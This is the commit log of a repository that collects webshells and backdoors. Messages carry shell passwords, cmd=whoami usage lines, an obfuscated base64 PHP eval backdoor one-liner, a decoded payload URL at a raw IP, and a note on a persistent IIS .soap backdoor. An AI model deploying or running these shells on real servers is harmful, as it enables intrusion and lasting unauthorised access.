tennc
|
69249a2ad7
|
Update w.php
``` php
687474703A2F2F3132332E3132352E3131342E38322F6A78666275636B657432303134312F6861636B2F312E6A7067
```
to
``` php
http://123.125.114.82/jxfbucket20141/hack/1.jpg
```
|
2016-05-27 21:52:18 +08:00 |
|
tennc
|
8c50cf38f8
|
Create w.php
from : zone.wooyun.org
|
2016-05-27 21:50:24 +08:00 |
|
tennc
|
b09d2eadcc
|
Create w_2016-05-25.php
usage : shell.php?x=1 password "x"
or shell.php password "x"
|
2016-05-25 10:06:56 +08:00 |
|
tennc
|
5ce79c1ab2
|
add pic
|
2016-05-16 09:34:58 +08:00 |
|
tennc
|
44134621b1
|
update @antoor 👍
from : zone.wooyun.org/27230
|
2016-05-16 09:32:55 +08:00 |
|
tennc
|
d7002a775f
|
Add files via upload
|
2016-05-16 09:29:39 +08:00 |
|
tennc
|
87ec53d3ce
|
Create mybase.md
|
2016-05-16 09:27:04 +08:00 |
|
tennc
|
7487bfa404
|
Merge pull request #14 from juniorsumbar/patch-1
Mini B374k
|
2016-05-16 09:12:07 +08:00 |
|
Junior Sumbar
|
f15d60d8cd
|
Mini B374k
|
2016-05-15 19:15:16 +07:00 |
|
tennc
|
c9479faa14
|
add webshell.asp @saveeoo 👍
from : https://gist.github.com/saveeoo/a8af827510df085f7f1c83208a898098
author : saveeoo
|
2016-05-14 17:32:00 +08:00 |
|
tennc
|
374204e0a1
|
Create zone_hackbar_other.php
|
2016-05-14 10:00:16 +08:00 |
|
tennc
|
2ca0e86887
|
Update zone_hackbar_beutify.php
|
2016-05-14 09:59:33 +08:00 |
|
tennc
|
bcd3802f2a
|
Create zone_hackbar.php
|
2016-05-14 09:59:03 +08:00 |
|
tennc
|
0f1969eb8f
|
Create zone_hackbar_beutify.php
|
2016-05-14 09:57:25 +08:00 |
|
tennc
|
6747dd53a1
|
Merge pull request #13 from radarhere/patch-1
Fixed typo
|
2016-05-10 09:16:34 +08:00 |
|
Andrew Murray
|
c2c5a56413
|
Fixed typo
|
2016-05-07 21:27:09 +10:00 |
|
tennc
|
83906eff2e
|
Update 非常规的pHp一句话木马.php
ps:经过网友@kevins1022 测试,不可用。特说明下。
或许是我们的测试姿势不正确。先保留
|
2016-05-05 16:25:39 +08:00 |
|
tennc
|
dac3f49545
|
Merge pull request #11 from 54Pany/master
add 啊D小工具 - 目录读写检测 [ASPX版].aspx
|
2016-04-20 11:52:06 +08:00 |
|
54Pany
|
2faec6d586
|
add 啊D小工具 - 目录读写检测 [ASPX版].aspx
|
2016-04-19 19:57:57 +08:00 |
|
tennc
|
c0b9db0a2c
|
add wso-4.2.4.php @twepl 👍
form : https://github.com/HARDLINUX/webshell
|
2016-04-18 10:22:00 +08:00 |
|
tennc
|
f3201ef686
|
Merge pull request #10 from Medicean/master
删除原蚁剑 jsp shell, 添加中国蚁剑 shell 目录及多个 shell
|
2016-04-15 22:03:42 -05:00 |
|
Medicean
|
5d27dc3dd3
|
修正 readme
|
2016-04-16 02:23:35 +08:00 |
|
Medicean
|
8bcd40d1af
|
删除原蚁剑 jsp shell, 添加中国蚁剑 shell 目录及多个 shell
|
2016-04-16 02:19:29 +08:00 |
|
tennc
|
5cb5936681
|
Create jsp_File_browser.jsp
from : https://github.com/farnulfo/jspfilebrowser
|
2016-04-05 14:52:55 +08:00 |
|
tennc
|
ea7284f287
|
Create test.jsp
usage: http://www.xxx.xxx/test.jsp?cmd=command
http://www.xxx.xxx/test.jsp?cmd=whoami
|
2016-04-05 14:30:53 +08:00 |
|
tennc
|
072e033e32
|
Create pb.jsp
exp: http://www.xxx.xxx/pb.jsp?cmd=command
http://www.xxx.xxx/pb.jsp?cmd=whoami
|
2016-04-05 14:27:42 +08:00 |
|
tennc
|
db87aa1609
|
add shell_ant.jsp @antoor 👍
password : ant
author: antoor
|
2016-04-05 14:23:57 +08:00 |
|
tennc
|
6c6fd08281
|
add caidao shell for jsp
passowrd: yunyan
|
2016-04-05 14:21:25 +08:00 |
|
tennc
|
aa46988557
|
Create Customize.soap
from : zone.wooyun.org
author : RedFree
1、.soap文件只有放在web根目录时才能顺利调用,放到子目录中会报错!
这个错误我并未解决,且待更深入的学习吧。。。
2、.soap调用一次后,即便把这个文件删除,方法依然存在且可调用,除非重启IIS!(很好的后门咩)
3、针对不同的.NET版本,以上代码有可能报错,可自行修改。
4、因无法搞定GET/POST传参的异常,如果要使用菜刀去连接,你需要写一个简单的中转脚本。
|
2016-04-05 12:42:19 +08:00 |
|
tennc
|
43a5e624c8
|
add cutstomize.asp
author: RedFree
form : zone.wooyun.org
password : z
choice : cutstomize
|
2016-03-16 13:14:22 +08:00 |
|
tennc
|
0847517820
|
add Ridter'Pentest backdoor tools @Ridter 👍
|
2016-03-02 11:48:51 +08:00 |
|
tennc
|
1ace28d60b
|
create version 4.2.3 @twepl 👍
form : https://github.com/HARDLINUX/webshell
|
2016-01-25 14:57:57 +08:00 |
|
tennc
|
626bc6a486
|
create version 4.2.2 @twepl 👍
form : https://github.com/HARDLINUX/webshell
|
2016-01-11 13:37:25 +08:00 |
|
tennc
|
6d480c737d
|
Create z-2016-01-05.php
password: z
from : zone.wooyun.org
|
2016-01-05 20:53:06 +08:00 |
|
tennc
|
77ccd336c5
|
create version 4.2.1 @twepl 👍
|
2015-12-27 11:35:18 +08:00 |
|
tennc
|
067ed71861
|
create readme.md @twepl 👍
|
2015-12-27 11:31:57 +08:00 |
|
tennc
|
70dcf0e796
|
Create wso-4.2.0.php
|
2015-12-26 11:03:49 +08:00 |
|
tennc
|
4b4b299426
|
update other shell repository @tanjiti 👍
|
2015-12-25 14:13:53 +08:00 |
|
tennc
|
242e1db98b
|
Create sqzr.php
password: sqzr
caidao shell
$mpy = create_function('', base64_decode("IEBldmFsKCRfUE9TVFsnc3F6ciddKTs=")); $mpy();
|
2015-12-25 14:04:47 +08:00 |
|
tennc
|
3fc2d3a889
|
Create good_1.asp
当参数task=1时
如果你传递参数
http://222.39.14.164/xdexdb4w.asp;.txt?task=1&paths=jtgw&nnfilename=1.asp&content=lalla
参数说明
task:执行命令的id
paths:在哪个文件夹写文件(如果是空,则在在最后一个文件夹下写入文件)
nnfilename:文件名
content:文件内容
主要这个被写出来的文件被隐藏成为系统文件类型,而且是文件为只读
当task=2时
当传递的参数为
http://localhost/1.asp?task=2&paths=&defaulthtml=mengmeng&nnfilename=1.txt&content=mamama
这个功能只是比上一个多出来了一个创建文件夹的功能
defaulthtml:创建的文件夹名字
from: zone.wooyun.org
|
2015-12-17 09:55:51 +08:00 |
|
tennc
|
52cccb6308
|
Create x.jsp
|
2015-11-30 22:56:17 +08:00 |
|
tennc
|
f52e977b24
|
Create shell1.jsp
|
2015-11-30 22:54:45 +08:00 |
|
tennc
|
1415965584
|
Rename t00ls.jsp to t00ls1.jsp
|
2015-11-30 22:54:11 +08:00 |
|
tennc
|
08c970a69a
|
Create ha.jsp
|
2015-11-30 22:51:44 +08:00 |
|
tennc
|
c94962d51a
|
Create dy.jsp
|
2015-11-30 22:50:17 +08:00 |
|
tennc
|
eca96146e9
|
add wso-4.1.3.php @twepl 👍
from : https://github.com/HARDLINUX/webshell
|
2015-11-24 13:27:44 +08:00 |
|
tennc
|
7e295e77ec
|
add reverse-shell-cheat-sheet
from : http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
|
2015-11-06 13:50:00 +08:00 |
|
tennc
|
0d5688e8eb
|
add w-ob_start02.php
author : isno
from : wooyun.org
success running PHP5.3.3 >=
|
2015-10-29 20:30:34 +08:00 |
|
tennc
|
e046b28382
|
add w-ob_start01.php
from : wooyun.org
author : isno
|
2015-10-29 20:28:44 +08:00 |
|
tennc
|
777cd7a179
|
Create readme.md
author : Jeary
|
2015-10-22 12:23:20 +08:00 |
|